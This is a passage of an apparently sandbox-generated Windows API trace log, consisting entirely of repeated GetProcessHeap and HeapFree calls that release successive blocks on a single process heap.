[0178.193] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f26f0 | out: hHeap=0x2d0000) returned 1 [0178.193] GetProcessHeap () returned 0x2d0000 [0178.193] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2710 | out: hHeap=0x2d0000) returned 1 [0178.193] GetProcessHeap () returned 0x2d0000 [0178.193] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2730 | out: hHeap=0x2d0000) returned 1 [0178.193] GetProcessHeap () returned 0x2d0000 [0178.193] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2750 | out: hHeap=0x2d0000) returned 1 [0178.193] GetProcessHeap () returned 0x2d0000 [0178.193] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2770 | out: hHeap=0x2d0000) returned 1 [0178.193] GetProcessHeap () returned 0x2d0000 [0178.193] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2790 | out: hHeap=0x2d0000) returned 1 [0178.193] GetProcessHeap () returned 0x2d0000 [0178.193] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f27e0 | out: hHeap=0x2d0000) returned 1 [0178.193] GetProcessHeap () returned 0x2d0000 [0178.193] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2800 | out: hHeap=0x2d0000) returned 1 [0178.193] GetProcessHeap () returned 0x2d0000 [0178.193] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2820 | out: hHeap=0x2d0000) returned 1 [0178.193] GetProcessHeap () returned 0x2d0000 [0178.193] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2840 | out: hHeap=0x2d0000) returned 1 [0178.193] GetProcessHeap () returned 0x2d0000 [0178.193] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2860 | out: hHeap=0x2d0000) returned 1 [0178.193] GetProcessHeap () returned 0x2d0000 [0178.193] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2880 | out: hHeap=0x2d0000) returned 1 [0178.193] GetProcessHeap () returned 0x2d0000 [0178.193] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f28a0 | out: hHeap=0x2d0000) returned 1 [0178.193] GetProcessHeap () returned 0x2d0000 [0178.193] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f28c0 | out: hHeap=0x2d0000) returned 1 [0178.193] GetProcessHeap () returned 0x2d0000 [0178.193] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f28e0 | out: hHeap=0x2d0000) returned 1 [0178.193] GetProcessHeap () returned 0x2d0000 [0178.193] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2900 | out: hHeap=0x2d0000) returned 1 [0178.193] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2920 | out: hHeap=0x2d0000) returned 1 [0178.194] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2940 | out: hHeap=0x2d0000) returned 1 [0178.194] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2960 | out: hHeap=0x2d0000) returned 1 [0178.194] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2980 | out: hHeap=0x2d0000) returned 1 [0178.194] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f29a0 | out: hHeap=0x2d0000) returned 1 [0178.194] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f29c0 | out: hHeap=0x2d0000) returned 1 [0178.194] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f29e0 | out: hHeap=0x2d0000) returned 1 [0178.194] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2a00 | out: hHeap=0x2d0000) returned 1 [0178.194] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2a20 | out: hHeap=0x2d0000) returned 1 [0178.194] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2a40 | out: hHeap=0x2d0000) returned 1 [0178.194] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2a60 | out: hHeap=0x2d0000) returned 1 [0178.194] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2a80 | out: hHeap=0x2d0000) returned 1 [0178.194] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2aa0 | out: hHeap=0x2d0000) returned 1 [0178.194] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2ac0 | out: hHeap=0x2d0000) returned 1 [0178.194] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2ae0 | out: hHeap=0x2d0000) returned 1 [0178.194] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2b00 | out: hHeap=0x2d0000) returned 1 [0178.194] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2b20 | out: hHeap=0x2d0000) returned 1 [0178.194] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2b40 | out: hHeap=0x2d0000) returned 1 [0178.194] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2b60 | out: hHeap=0x2d0000) returned 1 [0178.194] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2b80 | out: hHeap=0x2d0000) returned 1 [0178.194] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2ba0 | out: hHeap=0x2d0000) returned 1 [0178.194] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2bc0 | out: hHeap=0x2d0000) returned 1 [0178.194] GetProcessHeap () returned 0x2d0000 [0178.194] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2be0 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2c00 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2c20 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2c40 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2c60 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2c80 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2ca0 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2cc0 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2ce0 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2d00 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2d20 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2d40 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2d60 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2d80 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2da0 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2dc0 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2de0 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2e00 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2e20 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2e40 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2e60 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2e80 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2ea0 | out: hHeap=0x2d0000) returned 1 [0178.195] GetProcessHeap () returned 0x2d0000 [0178.195] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2ec0 | out: hHeap=0x2d0000) returned 1 [0178.196] GetProcessHeap () returned 0x2d0000 [0178.196] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2ee0 | out: hHeap=0x2d0000) returned 1 [0178.196] GetProcessHeap () returned 0x2d0000 [0178.196] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2f00 | out: hHeap=0x2d0000) returned 1 [0178.196] GetProcessHeap () returned 0x2d0000 [0178.196] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2f20 | out: hHeap=0x2d0000) returned 1 [0178.196] GetProcessHeap () returned 0x2d0000 [0178.196] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2f40 | out: hHeap=0x2d0000) returned 1 [0178.196] GetProcessHeap () returned 0x2d0000 [0178.196] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2f60 | out: hHeap=0x2d0000) returned 1 [0178.196] GetProcessHeap () returned 0x2d0000 [0178.196] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2f80 | out: hHeap=0x2d0000) returned 1 [0178.196] GetProcessHeap () returned 0x2d0000 [0178.196] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2fe0 | out: hHeap=0x2d0000) returned 1 [0178.196] GetProcessHeap () returned 0x2d0000 [0178.196] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3000 | out: hHeap=0x2d0000) returned 1 [0178.196] GetProcessHeap () returned 0x2d0000 [0178.196] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3020 | out: hHeap=0x2d0000) returned 1 [0178.196] GetProcessHeap () returned 0x2d0000 [0178.196] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3040 | out: hHeap=0x2d0000) returned 1 [0178.196] GetProcessHeap () returned 0x2d0000 [0178.196] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3060 | out: hHeap=0x2d0000) returned 1 [0178.196] GetProcessHeap () returned 0x2d0000 [0178.196] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3080 | out: hHeap=0x2d0000) returned 1 [0178.196] GetProcessHeap () returned 0x2d0000 [0178.196] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f30a0 | out: hHeap=0x2d0000) returned 1 [0178.196] GetProcessHeap () returned 0x2d0000 [0178.196] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f30c0 | out: hHeap=0x2d0000) returned 1 [0178.196] GetProcessHeap () returned 0x2d0000 [0178.196] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f30e0 | out: hHeap=0x2d0000) returned 1 [0178.196] GetProcessHeap () returned 0x2d0000 [0178.196] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3100 | out: hHeap=0x2d0000) returned 1 [0178.196] GetProcessHeap () returned 0x2d0000 [0178.196] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3120 | out: hHeap=0x2d0000) returned 1 [0178.196] GetProcessHeap () returned 0x2d0000 [0178.196] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3140 | out: hHeap=0x2d0000) returned 1 [0178.196] GetProcessHeap () returned 0x2d0000 [0178.196] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3160 | out: hHeap=0x2d0000) returned 1 [0178.196] GetProcessHeap () returned 0x2d0000 [0178.196] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3180 | out: hHeap=0x2d0000) returned 1 [0178.196] GetProcessHeap () returned 0x2d0000 [0178.196] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f31a0 | out: hHeap=0x2d0000) returned 1 [0178.196] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f31c0 | out: hHeap=0x2d0000) returned 1 [0178.197] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f31e0 | out: hHeap=0x2d0000) returned 1 [0178.197] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3200 | out: hHeap=0x2d0000) returned 1 [0178.197] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3220 | out: hHeap=0x2d0000) returned 1 [0178.197] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3240 | out: hHeap=0x2d0000) returned 1 [0178.197] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3260 | out: hHeap=0x2d0000) returned 1 [0178.197] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3280 | out: hHeap=0x2d0000) returned 1 [0178.197] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f32a0 | out: hHeap=0x2d0000) returned 1 [0178.197] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f32c0 | out: hHeap=0x2d0000) returned 1 [0178.197] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f32e0 | out: hHeap=0x2d0000) returned 1 [0178.197] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3300 | out: hHeap=0x2d0000) returned 1 [0178.197] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3320 | out: hHeap=0x2d0000) returned 1 [0178.197] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3340 | out: hHeap=0x2d0000) returned 1 [0178.197] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3360 | out: hHeap=0x2d0000) returned 1 [0178.197] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3380 | out: hHeap=0x2d0000) returned 1 [0178.197] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f33a0 | out: hHeap=0x2d0000) returned 1 [0178.197] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f33c0 | out: hHeap=0x2d0000) returned 1 [0178.197] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f33e0 | out: hHeap=0x2d0000) returned 1 [0178.197] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3400 | out: hHeap=0x2d0000) returned 1 [0178.197] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3420 | out: hHeap=0x2d0000) returned 1 [0178.197] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3440 | out: hHeap=0x2d0000) returned 1 [0178.197] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3460 | out: hHeap=0x2d0000) returned 1 [0178.197] GetProcessHeap () returned 0x2d0000 [0178.197] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3480 | out: hHeap=0x2d0000) returned 1 [0178.198] GetProcessHeap () returned 0x2d0000 [0178.198] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f34a0 | out: hHeap=0x2d0000) returned 1 [0178.198] GetProcessHeap () returned 0x2d0000 [0178.198] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f34c0 | out: hHeap=0x2d0000) returned 1 [0178.198] GetProcessHeap () returned 0x2d0000 [0178.198] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f34e0 | out: hHeap=0x2d0000) returned 1 [0178.198] GetProcessHeap () returned 0x2d0000 [0178.198] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3500 | out: hHeap=0x2d0000) returned 1 [0178.198] GetProcessHeap () returned 0x2d0000 [0178.198] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3520 | out: hHeap=0x2d0000) returned 1 [0178.198] GetProcessHeap () returned 0x2d0000 [0178.198] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3540 | out: hHeap=0x2d0000) returned 1 [0178.198] GetProcessHeap () returned 0x2d0000 [0178.198] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3560 | out: hHeap=0x2d0000) returned 1 [0178.198] GetProcessHeap () returned 0x2d0000 [0178.198] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3580 | out: hHeap=0x2d0000) returned 1 [0178.198] GetProcessHeap () returned 0x2d0000 [0178.198] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f35a0 | out: hHeap=0x2d0000) returned 1 [0178.198] GetProcessHeap () returned 0x2d0000 [0178.198] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f35c0 | out: hHeap=0x2d0000) returned 1 [0178.198] GetProcessHeap () returned 0x2d0000 [0178.198] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f35e0 | out: hHeap=0x2d0000) returned 1 [0178.198] GetProcessHeap () returned 0x2d0000 [0178.198] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3600 | out: hHeap=0x2d0000) returned 1 [0178.198] GetProcessHeap () returned 0x2d0000 [0178.198] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3620 | out: hHeap=0x2d0000) returned 1 [0178.198] GetProcessHeap () returned 0x2d0000 [0178.198] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3640 | out: hHeap=0x2d0000) returned 1 [0178.204] GetProcessHeap () returned 0x2d0000 [0178.204] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3660 | out: hHeap=0x2d0000) returned 1 [0178.204] GetProcessHeap () returned 0x2d0000 [0178.204] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3680 | out: hHeap=0x2d0000) returned 1 [0178.204] GetProcessHeap () returned 0x2d0000 [0178.204] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f36a0 | out: hHeap=0x2d0000) returned 1 [0178.204] GetProcessHeap () returned 0x2d0000 [0178.204] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f36c0 | out: hHeap=0x2d0000) returned 1 [0178.204] GetProcessHeap () returned 0x2d0000 [0178.204] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f36e0 | out: hHeap=0x2d0000) returned 1 [0178.204] GetProcessHeap () returned 0x2d0000 [0178.204] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3700 | out: hHeap=0x2d0000) returned 1 [0178.204] GetProcessHeap () returned 0x2d0000 [0178.204] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3720 | out: hHeap=0x2d0000) returned 1 [0178.204] GetProcessHeap () returned 0x2d0000 [0178.205] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3740 | out: hHeap=0x2d0000) returned 1 [0178.205] GetProcessHeap () returned 0x2d0000 [0178.205] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3760 | out: hHeap=0x2d0000) returned 1 [0178.205] GetProcessHeap () returned 0x2d0000 [0178.205] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3780 | out: hHeap=0x2d0000) returned 1 [0178.205] GetProcessHeap () returned 0x2d0000 [0178.205] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f37e0 | out: hHeap=0x2d0000) returned 1 [0178.205] GetProcessHeap () returned 0x2d0000 [0178.205] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3800 | out: hHeap=0x2d0000) returned 1 [0178.205] GetProcessHeap () returned 0x2d0000 [0178.205] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3820 | out: hHeap=0x2d0000) returned 1 [0178.205] GetProcessHeap () returned 0x2d0000 [0178.205] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3840 | out: hHeap=0x2d0000) returned 1 [0178.205] GetProcessHeap () returned 0x2d0000 [0178.205] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3860 | out: hHeap=0x2d0000) returned 1 [0178.205] GetProcessHeap () returned 0x2d0000 [0178.205] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3880 | out: hHeap=0x2d0000) returned 1 [0178.205] GetProcessHeap () returned 0x2d0000 [0178.205] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f38a0 | out: hHeap=0x2d0000) returned 1 [0178.205] GetProcessHeap () returned 0x2d0000 [0178.205] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f38c0 | out: hHeap=0x2d0000) returned 1 [0178.205] GetProcessHeap () returned 0x2d0000 [0178.205] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f38e0 | out: hHeap=0x2d0000) returned 1 [0178.205] GetProcessHeap () returned 0x2d0000 [0178.205] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3900 | out: hHeap=0x2d0000) returned 1 [0178.205] GetProcessHeap () returned 0x2d0000 [0178.205] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3920 | out: hHeap=0x2d0000) returned 1 [0178.205] GetProcessHeap () returned 0x2d0000 [0178.205] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3940 | out: hHeap=0x2d0000) returned 1 [0178.205] GetProcessHeap () returned 0x2d0000 [0178.205] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3960 | out: hHeap=0x2d0000) returned 1 [0178.205] GetProcessHeap () returned 0x2d0000 [0178.205] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3980 | out: hHeap=0x2d0000) returned 1 [0178.205] GetProcessHeap () returned 0x2d0000 [0178.206] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f39a0 | out: hHeap=0x2d0000) returned 1 [0178.206] GetProcessHeap () returned 0x2d0000 [0178.206] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f39c0 | out: hHeap=0x2d0000) returned 1 [0178.206] GetProcessHeap () returned 0x2d0000 [0178.206] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f39e0 | out: hHeap=0x2d0000) returned 1 [0178.206] GetProcessHeap () returned 0x2d0000 [0178.206] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3a00 | out: hHeap=0x2d0000) returned 1 [0178.206] GetProcessHeap () returned 0x2d0000 [0178.206] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3a20 | out: hHeap=0x2d0000) returned 1 [0178.206] GetProcessHeap () returned 0x2d0000 [0178.206] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3a40 | out: hHeap=0x2d0000) returned 1 [0178.206] GetProcessHeap () returned 0x2d0000 [0178.206] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3a60 | out: hHeap=0x2d0000) returned 1 [0178.206] GetProcessHeap () returned 0x2d0000 [0178.206] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3a80 | out: hHeap=0x2d0000) returned 1 [0178.206] GetProcessHeap () returned 0x2d0000 [0178.206] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3aa0 | out: hHeap=0x2d0000) returned 1 [0178.206] GetProcessHeap () returned 0x2d0000 [0178.206] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3ac0 | out: hHeap=0x2d0000) returned 1 [0178.206] GetProcessHeap () returned 0x2d0000 [0178.206] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3ae0 | out: hHeap=0x2d0000) returned 1 [0178.206] GetProcessHeap () returned 0x2d0000 [0178.206] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3b00 | out: hHeap=0x2d0000) returned 1 [0178.206] GetProcessHeap () returned 0x2d0000 [0178.206] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3b20 | out: hHeap=0x2d0000) returned 1 [0178.206] GetProcessHeap () returned 0x2d0000 [0178.206] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3b40 | out: hHeap=0x2d0000) returned 1 [0178.206] GetProcessHeap () returned 0x2d0000 [0178.206] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3b60 | out: hHeap=0x2d0000) returned 1 [0178.206] GetProcessHeap () returned 0x2d0000 [0178.206] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f3b80 | out: hHeap=0x2d0000) returned 1 [0178.206] GetProcessHeap () returned 0x2d0000 [0178.206] 